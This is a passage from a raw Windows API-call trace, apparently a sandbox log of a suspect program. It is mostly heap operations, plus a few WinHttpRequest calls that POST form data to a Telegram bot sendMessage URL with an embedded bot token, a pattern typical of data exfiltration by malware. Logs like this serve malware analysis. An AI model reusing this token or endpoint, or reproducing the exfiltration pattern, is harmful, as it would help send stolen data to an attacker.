hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0147.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0147.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0147.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0147.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0147.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a2078 | out: hHeap=0x1780000) returned 1 [0147.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0147.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0147.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x499e5a8 [0147.136] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa) returned 0x43cac10 [0147.136] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x18523c0, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x144f2f0*="Open", cNames=0x1, lcid=0x800, rgDispId=0x144f3f4 | out: rgDispId=0x144f3f4*=1) returned 0x0 [0147.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0147.136] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x18523c0, iTInfo=0x0, lcid=0x800, ppTInfo=0x144f2e8 | out: ppTInfo=0x144f2e8*=0x43fc994) returned 0x0 [0147.728] ITypeInfo:GetTypeAttr (in: This=0x43fc994, ppTypeAttr=0x144f2e0 | out: ppTypeAttr=0x144f2e0) returned 0x0 [0147.728] ITypeInfo:GetNames (in: This=0x43fc994, memid=21295860, rgBstrNames=0x1, cMaxNames=0x144f2d8, pcNames=0x356310 | out: rgBstrNames=0x1, pcNames=0x356310*=0x3225e4) returned 0x0 [0147.728] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x0 | out: ppTComp=0x0) returned 0x0 [0147.818] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=68831428, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.818] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x1 | out: ppTComp=0x1) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70918628, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x2 | out: ppTComp=0x2) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70918628, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x3 | out: ppTComp=0x3) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=68831428, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x4 | out: ppTComp=0x4) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=68831428, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x5 | out: ppTComp=0x5) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x6 | out: ppTComp=0x6) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x7 | out: ppTComp=0x7) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=68831428, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x8 | out: ppTComp=0x8) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=68831428, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x9 | out: ppTComp=0x9) returned 0x0 [0147.819] ITypeInfo:RemoteGetDocumentation (in: This=0x43fc994, memid=70621180, refPtrFlags=0x356310, pbstrName=0x144f4d0, pBstrDocString=0x0, pdwHelpContext=0x43cac10, pBstrHelpFile=0x1 | out: pbstrName=0x144f4d0*="Open", pBstrDocString=0x0, pdwHelpContext=0x43cac10*=0x70004f, pBstrHelpFile=0x1) returned 0x0 [0147.819] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=68831428, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x43cac10 | out: pBstrDllName=0x144f4d0*="Open", pbstrName=0x0, pwOrdinal=0x43cac10*=0x4f) returned 0x0 [0147.819] WinHttpRequest:IUnknown:Release (This=0x43fc994) returned 0x1 [0147.819] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x44) returned 0x43ebe38 [0147.821] WinHttpRequest:IDispatch:Invoke (in: This=0x18523c0, dispIdMember=1, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x144f3d8*(rgvarg=([0]=0x43ebe3c*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x43ebe4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://api.telegram.org/bot786047086:AAHptlQeKzm_r6t0IxBwnxtJ5F_MKB6BjXc/sendMessage", varVal2=0x0), [2]=0x43ebe5c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x144f3a0, puArgErr=0x144f3e8 | out: pDispParams=0x144f3d8*(rgvarg=([0]=0x43ebe3c*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x43ebe4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://api.telegram.org/bot786047086:AAHptlQeKzm_r6t0IxBwnxtJ5F_MKB6BjXc/sendMessage", varVal2=0x0), [2]=0x43ebe5c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x144f3a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x144f3e8*=0x144f408) returned 0x0 [0149.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499e5a8 | out: hHeap=0x1780000) returned 1 [0149.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0149.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0149.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ebe38 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0149.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43f3c90 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0149.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0149.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0149.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0149.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0149.954] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 1 [0149.954] TranslateMessage (lpMsg=0x144f9e4) returned 0 [0149.954] DispatchMessageW (lpMsg=0x144f9e4) returned 0x0 [0149.954] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0149.954] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0149.954] PeekMessageW (in: lpMsg=0x144f9e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f9e4) returned 0 [0149.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0149.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0149.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0149.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0149.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392e30 [0149.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0149.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac28 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0149.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0149.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0149.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x499e688 [0149.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e00e8 [0149.956] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x18523c0, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x144f2f0*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x144f3f4 | out: rgDispId=0x144f3f4*=2) returned 0x0 [0149.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e00e8 | out: hHeap=0x1780000) returned 1 [0149.956] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x18523c0, iTInfo=0x0, lcid=0x800, ppTInfo=0x144f2e8 | out: ppTInfo=0x144f2e8*=0x43fc994) returned 0x0 [0149.956] ITypeInfo:GetTypeAttr (in: This=0x43fc994, ppTypeAttr=0x144f2e0 | out: ppTypeAttr=0x144f2e0) returned 0x0 [0149.956] ITypeInfo:GetNames (in: This=0x43fc994, memid=21295860, rgBstrNames=0x1, cMaxNames=0x144f2d8, pcNames=0x356310 | out: rgBstrNames=0x1, pcNames=0x356310*=0x3225e4) returned 0x0 [0149.956] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x0 | out: ppTComp=0x0) returned 0x0 [0149.956] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.956] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x1 | out: ppTComp=0x1) returned 0x0 [0149.956] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70918628, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.956] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x2 | out: ppTComp=0x2) returned 0x0 [0149.956] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70918628, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.956] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x3 | out: ppTComp=0x3) returned 0x0 [0149.956] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.956] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x4 | out: ppTComp=0x4) returned 0x0 [0149.956] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.956] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x5 | out: ppTComp=0x5) returned 0x0 [0149.956] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.956] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x6 | out: ppTComp=0x6) returned 0x0 [0149.956] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70339860, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.957] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x7 | out: ppTComp=0x7) returned 0x0 [0149.957] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.957] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x8 | out: ppTComp=0x8) returned 0x0 [0149.957] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.957] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0x9 | out: ppTComp=0x9) returned 0x0 [0149.957] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.957] ITypeInfo:GetTypeComp (in: This=0x43fc994, ppTComp=0xa | out: ppTComp=0xa) returned 0x0 [0149.957] ITypeInfo:RemoteGetDocumentation (in: This=0x43fc994, memid=70621180, refPtrFlags=0x356310, pbstrName=0x144f4d0, pBstrDocString=0x0, pdwHelpContext=0x17e00e8, pBstrHelpFile=0x2 | out: pbstrName=0x144f4d0*="SetRequestHeader", pBstrDocString=0x0, pdwHelpContext=0x17e00e8*=0x650053, pBstrHelpFile=0x2) returned 0x0 [0149.957] ITypeInfo:GetDllEntry (in: This=0x43fc994, memid=70095748, invkind=3498768, pBstrDllName=0x144f4d0, pbstrName=0x0, pwOrdinal=0x17e00e8 | out: pBstrDllName=0x144f4d0*="SetRequestHeader", pbstrName=0x0, pwOrdinal=0x17e00e8*=0x53) returned 0x0 [0149.957] WinHttpRequest:IUnknown:Release (This=0x43fc994) returned 0x1 [0149.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x34) returned 0x41ac9c0 [0149.957] WinHttpRequest:IDispatch:Invoke (in: This=0x18523c0, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x144f3d8*(rgvarg=([0]=0x41ac9c4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0x41ac9d4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x144f3a0, puArgErr=0x144f3e8 | out: pDispParams=0x144f3d8*(rgvarg=([0]=0x41ac9c4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0x41ac9d4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x144f3a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x144f3e8*=0x144f408) returned 0x0 [0149.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499e688 | out: hHeap=0x1780000) returned 1 [0149.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0149.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac9c0 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0149.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392e30 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0149.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: 